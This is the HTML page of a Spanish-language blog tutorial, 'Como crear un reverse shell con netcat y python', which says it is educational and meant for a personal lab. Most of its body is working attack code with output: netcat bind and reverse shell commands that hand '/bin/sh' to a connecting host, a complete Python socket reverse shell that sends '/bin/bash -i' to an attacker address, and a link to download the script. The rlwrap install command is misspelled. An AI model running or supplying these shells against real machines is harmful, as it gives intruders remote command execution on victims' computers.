<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>CodeRobots</title>
	<!--reverse shell-->
	<style type="text/css">
		.local{
			width: 888px;
			height: 4300px;
			background-image: url(/images/icon_image.jpg);
			margin: 2px;
			border: 2px solid dimgray;
			border-radius: 20px 20px 20px 20px;
			opacity: 0.9;
		}
	</style>
	<style type="text/css">
		h1 {
			color: darkgreen;
			font-family: 'PT Sans';
			margin: 5px;
		}
		img {
			border-color: burlywood;
			float: left;
		}
		a {
			color: black;
			margin: 2px;
			float: left;
		}
		li {
			float: left;
			margin: 2px;

		}

		}
		div {
			opacity: 0.8;
		}
		p {
			color: white;
			font-family: 'PT Sans';
		}
		li {
		}
		body {
			background-image: url(/images/background.jpg);
		}
		center {
			color: white; font-style: italic;
		}
	</style>
	<style type="text/css">
		.log{
			margin: 5px;
			float: left;
			position: initial;

		}
	</style>
	<style type="text/css">
		.main{
			width: 1200;
			height: 10;
			background-image: url(/images/icon_image.jpg);
			border: solid dimgray;
			margin: 2px;
			float: left;
			border-radius: 15px 15px 15px 15px;
		}
	</style>
	<style type="text/css">
		.info{
			width: 300;
			height: 300;
			background-image: url(/images/icon_image.jpg);
			border: solid dimgray;
			margin: 2px;
			float: none;
			border-radius: 20px 20px 15px 15px;
		}
	</style>
	<style type="text/css">
		.title{
			width: 100;
			height: 10;
			background-image: url(images/icon_image.jpg);
			margin: 2px;
			border-radius: 15px 15px 15px 15px;
		}
	</style>
	<style>
      .cua{
        padding:10px;
        margin:10px;
        border: 2px solid green;
        background-color: #000000;
        color: white;
      }
    </style>
    <style>
      .py{
        padding:10px;
        margin:10px;
        border: 2px solid yellow;
        background-color: #000000;
        color: white;
      }
    </style>
    <style>
      .mo{
        padding:10px;
        margin:10px;
        border: 2px solid green;
        background-color: #000000;
        color: white;
      }
    </style>
    <style>
      .on{
        padding:10px;
        margin:10px;
        border: 2px solid green;
        background-color: #000000;
        color: white;
      }
    </style>
        <style>
      .at{
        padding:10px;
        margin:10px;
        border: 2px solid green;
        background-color: #000000;
        color: white;
      }
    </style>
        <style>
      .conex{
        padding:10px;
        margin:10px;
        border: 2px solid green;
        background-color: #000000;
        color: white;
      }
  </style>
	<!--https://fondosmil.com/fondo/11471.jpg-->

</head>
<body>
	<center>
		<div class=title>
			<h1 style="color: blue;">CodeRobots</h1>
		</div>
	</center>
	<center>
		<div class=main>
			<ul>
				<li type="square" style="color: skyblue;"><a style="color: blue;" href="/home/aMoo6pgmpyjpAgwwlz3l33NOyfuy2dUJqC9Mkphk7JvhViRQGD.html">Back &nbsp &nbsp</a></li>
				<li type="square" style="color: skyblue;"><a style="color: blue;" href="https://coderobots.foroactivo.com/">Foros &nbsp &nbsp</a></li>
				<li type="square" style="color: skyblue;"><a style="color: blue;" href="/news/Nik3d8qGqqhHxBDqh1dpRuxkwWIeg5RVrWn5BikexRB9Mxnk1e.html">News &nbsp &nbsp</a></li>
				<li type="square" style="color: skyblue;"><a style="color: blue;" href="/cont/contact.html">Contact Us &nbsp</a></li>
			</ul>
		</div>
	</center>
		<br>
		<br>
		<br>
		<br>
	<center>
		<div class=local style="margin: 100px;">
			<h1 style="color: blue;">Como crear un reverse shell con netcat y python</h1>
	<p>
      Bienvenidos sean a este nuevo bloc, hoy abarcare un tema importante en el ambito de la ciberseguridad.<br>
      Hoy hablaremos sobre los reverse shell y los bind shell. Que es un reverse shell, en resumen es un programa<br>
      que se ejecuta en una maquina devolviendo una shell que seria un terminal a la maquina del atacante<br>
      obteniendo acceso al computador de la victima. Sobre todo quiero recalcar que esto es hecho con fines<br>
      educativos y no me hare responsable de cualquier pendejada que lleguen a hacer, recuerden hacerlo dentro<br>
      de su laboratorio personal y no afectar a terceros, ya que es un delito y te puedes meter en problemas.<br><br>
      Lo primero que hare es hacer un reverse shell y un bind shell con netcat y luego un ejemplo de un reverse shell<br>
      con python.<br><br>
      Empezamos con una bind shell en netcat para ello colocamos lo siguiente en la maquina victima<br>
      o simplemente podemos crear un script que haga el trabajo por nosotros:<br><br>
      <div class=cua>
        ncat -lvp 7777 -e /bin/sh
      </div>
      <br>
      ncat : es el comando que inicia netcat<br>
      -l : es el puerto escuchando esperando una conexion<br>
      v: funciona para que te muestre informacion sobre la conexion<br>
      p : es el puerto en este caso el 7777<br>
      -e : es el nombre de la shell a la que se le hara reversa<br> 
      Este comando no necesitara acceso root ya que se esta utilizando el puerto 7777, solamente se necesitara root con<br>
      los puertos de 1024 hacia abajo.<br>
      Despues de dar enter nos saldra lo siguiente:<br>
      <div class=mo>
        Ncat: Version 7.80 ( https://nmap.org/ncat )<br>
        Ncat: Listening on :::7777<br>
        Ncat: Listening on 0.0.0.0:7777<br>
      </div>
      Despues de esto la maquina victima estara esperando una conexion ahora nos toca a nosotros conectarnos para ello escribimos<br>
      en el terminal de nuestra maquina<br>
      <div class=on>
         nc -n -v 192.168.8.117 7777<br>
      </div>
      Usteden deben escribir la direccion ip que les corresponde, en este caso la direccion victima es 192.168.8.117.<br>
      Ahora le damos enter y podemos ver que en nuestro terminal no pasa nada, que sera lo que sucedio?<br>
      Solamente nos saldra esto: <br><br>
      <div class=at>
        nc -n -v 192.168.8.117 7777<br>
        Connection to 192.168.8.117 7777 port [tcp/*] succeeded!<br>
      </div>
      Si ejecutamos un comando como ls, veremos que nos arroja un resultado<br><br>
      <div class=conex>
        nc -n -v 192.168.8.117 7777<br>
        Connection to 192.168.8.117 7777 port [tcp/*] succeeded!<br>
        ls<br>
        Descargas<br>
        Documentos<br>
        Escritorio<br>
        Imagenes<br>
        Musica<br>
        Plantillas<br>
        Publico<br>
        Videos<br>
      </div>
      Podemos ejecutar comandos :D de la maquina remota, de esta manera habremos obtenido acceso a la shell<br>
      es un metodo bastante sencillo y peligroso a la vez(Ya dire porque mas adelante).<br><br><br>
      Ahore lo que sigue como hacer un reverse shell con netcat?<br>
      Comenzamos poniendo nuestra maquina a la escucha con lo siguiente<br>
      <div class=conex>
        ncat -lvp 7777<br>
        Ncat: Version 7.80 ( https://nmap.org/ncat )<br>
        Ncat: Listening on :::7777<br>
        Ncat: Listening on 0.0.0.0:7777<br>
      </div>
      Con esto ya estariamos a la escucha en <b>nuestra</b> maquina. Ahora vamos a ejecutar el siguiente<br>
      comando en la maquina victima<br><br>
      <div class=conex>
        ncat -nv 192.168.8.117:7777 -e /bin/sh
      </div>
      Al dar enter en la maquina victima no nos aparecera absolutamente nada<br>
      pero como ya sabemos es posible ejecutar comandos remotos<br><br>
      <div class=conex>
        ncat -l -v -p 5555<br>
        Ncat: Version 7.80 ( https://nmap.org/ncat )<br>
        Ncat: Listening on :::5555<br>
        Ncat: Listening on 0.0.0.0:5555<br>
        Ncat: Connection from 192.168.8.117.<br>
        Ncat: Connection from 192.168.8.117:54898.<br>
        ls<br>
        Descargas<br>
        Documentos<br>
        Escritorio<br>
        Imagenes<br>
        Musica<br>
        Plantillas<br>
        Publico<br>
        Videos<br><br>
      </div>
      Entonces despues de haber comprendido como hacer un reverse shell y un bind shell con netcat<br>
      voy a mostrarles como hacer un reverse shell simple en python<br><br>
      Para ello hacemos lo siguiente: <br>
      <div class=py>
        <font color=red>import </font>socket<font color=gray> #importamos la libreria de socket</font><br>
        <font color=red>import </font>subprocess<font color=gray> #E importamos subprocess y su modulo Popen</font><br>
        <font color=red>from </font>subprocess <font color=red>import</font> Popen<br><br>
        <font color=green>sock <font color=red>= </font></font>socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br>
        <font color=gray>
          #sock : es nuestra variable que va a almacenar la informacion de nuestro socket<br>
          #socket.AF_INET : es para especificar que usaremos el tipo de IPV4<br>
          #socket.SOCK_STREAM : es para especificar que usaremos el protocolo TCP/IP<br>
          <font color=green>shell<font color=red>= </font></font><font color=yellow>[<font color=green>'/bin/bash', '-i'</font>]</font><br>
          <font color=gray>#Colocamos el tipo de shell que queremos que se mande a nuestro host</font><br>
          <font color=green>sock.<font color=blue>connect( (<font color=green> '192.168.8.117', <font color=magenta>7777</font></font>) )</font></font><br>
          <font color=gray>#Conectamos nuestro socket a la direccion y puerto asignado<br>
            #Obviamente deben utilizar ustedes su propia ip y puerto<br>
          #Recuerden que la ip debe ser un string y el puerto un int, o les lanzara un error.</font><br>
          <font color=green>sub <font color=red>= </font></font><font color=green>sock.<font color=blue>fileno()</font></font><br>
          <font color=gray>#Vamos a asignarle un subproceso a socket, para que no los mande a nustro host al ejecutarse</font><br>
          <font color=blue>Popen(<font color=green>shell</font>, <font color=green>stdin<font color=red>=</font><font color=green></font>sub</font>, <font color=green>stdout<font color=red>=</font><font color=green>sub</font></font>, <font color=green>stderr<font color=red>=</font><font color=green>sub</font> )</font><br>
          <font color=gray>#Aqui llamamos el subproceso de una shell para que se mande hacia nuestro host</font>
        </font>
      </font>
    </div>
      Despues esto lo podemos poner en cualquier editor de texto y lo guardamos con la extension '.py' por ejemplo<br>
      nombre.py. Ahora antes de ejecutar nuestro reverse en la maquina vict, vamos a poner a la escucha nuestro pc<br>
      para recibir conexiones.<br><br>
      <div class=conex>
        ncat -lvp 7777<br>
        Ncat: Version 7.80 ( https://nmap.org/ncat )<br>
        Ncat: Listening on :::7777<br>
        Ncat: Listening on 0.0.0.0:7777<br><br>
      </div>
      Nos ponemos a la escucha y esperamos conexiones<br>
      Ejecutamos el script python con el siguiente comando: <br><br>
      <div class=conex>
        python3 nombre.py
      </div><br><br>
      Obviamente debes poner el nombre que le pusiste al archivo, despues de ejecutar nos aparecera esto<br>
      <div class=conex>
        main@notebook:~/Documentos/web$ ls<br>
        ls<br>
        all-free-download.com.url<br>
        coment.html<br>
        command.html<br>
        contact.html<br>
        home.html<br>
        images<br>
        index.html<br>
        main.php<br>
        news.html<br>
        rev_shell_py.html<br>
        rot<br>
        test.py<br>
      </div>
      Nos retorno una shell bash y podemos ejecutar comandos bien, pero hay algo que sucede<br>
      si puedes observar puedes ver que salen estos signos extranos al tocar las flechas de arriba y abajo<br>
      o cuando quieres moverte entre los caracteres, bueno hay una forma de evitar esto.
      Debemos poner el comando rlwrap. Lo debemos poner antes del comando de netcat.<br>
      <div class=conex>
        rlwrap ncat -lvp 7777<br>
        Ncat: Version 7.80 ( https://nmap.org/ncat )<br>
        Ncat: Listening on :::7777<br>
        Ncat: Listening on 0.0.0.0:7777<br>
      </div><br>
      Ejecutamos el script python, y ahora si podremos utilizar las flechas sin que nos lance los signos de extraterrestres.<br><br>
      Para instalar rwlrap escribimos<br>
      <div class=conex>
        sudo apt -y install rwlrap
      </div><br>
      <h1 style="color: blue;" >El peligro de usar un bind shell</h1><br>
      El peligro de usar un bindshell es que la escucha se hace en la maquina victima, por lo tanto cualquier persona<br>
      con acceso a la red, se puede conectar por lo tanto no es una manera tan fiable de conexion con una maquina remota.<br>
      En cambion un reverse shell la conexion es reversa osea que se hace de la maquina victima a nuestra maquina.<br>
      es decir que el cliente se conecta al servidor y no el servidor al cliente.<br>
      Bueno ya sabes porque es peligroso usar una bind shell, tu decidiras cual usar.<br>
      <br>
      Bueno espero que les haya gustado este pequeño bloc, recuerden hacerme llegar sus preguntas a mi correo electronico<br>
      o escribirlo en la seccion de comentarios de este blog.<br>
      <p style="font-style: italic;">
				"Las computadoras son inutiles, solamente te pueden dar respuestas"<br>
			</p>
      <br>
      <h1 style="color: blue;" >Files</h1><br>
      <a style="color: blue; margin: 4px;" href="/files/test.py" download="prueba_reverse_shell.py">Descarga el script python aqui</a><br><br>
            <div id="disqus_thread"></div>
<script>
    /**
    *  RECOMMENDED CONFIGURATION VARIABLES: EDIT AND UNCOMMENT THE SECTION BELOW TO INSERT DYNAMIC VALUES FROM YOUR PLATFORM OR CMS.
    *  LEARN WHY DEFINING THESE VARIABLES IS IMPORTANT: https://disqus.com/admin/universalcode/#configuration-variables    */
    /*
    var disqus_config = function () {
    this.page.url = PAGE_URL;  // Replace PAGE_URL with your page's canonical URL variable
    this.page.identifier = PAGE_IDENTIFIER; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
    */
    (function() { // DON'T EDIT BELOW THIS LINE
    var d = document, s = d.createElement('script');
    s.src = 'https://coderobots.disqus.com/embed.js';
    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();
</script>
<noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
    </div>
	   </div>
	</center>

</body>
</html>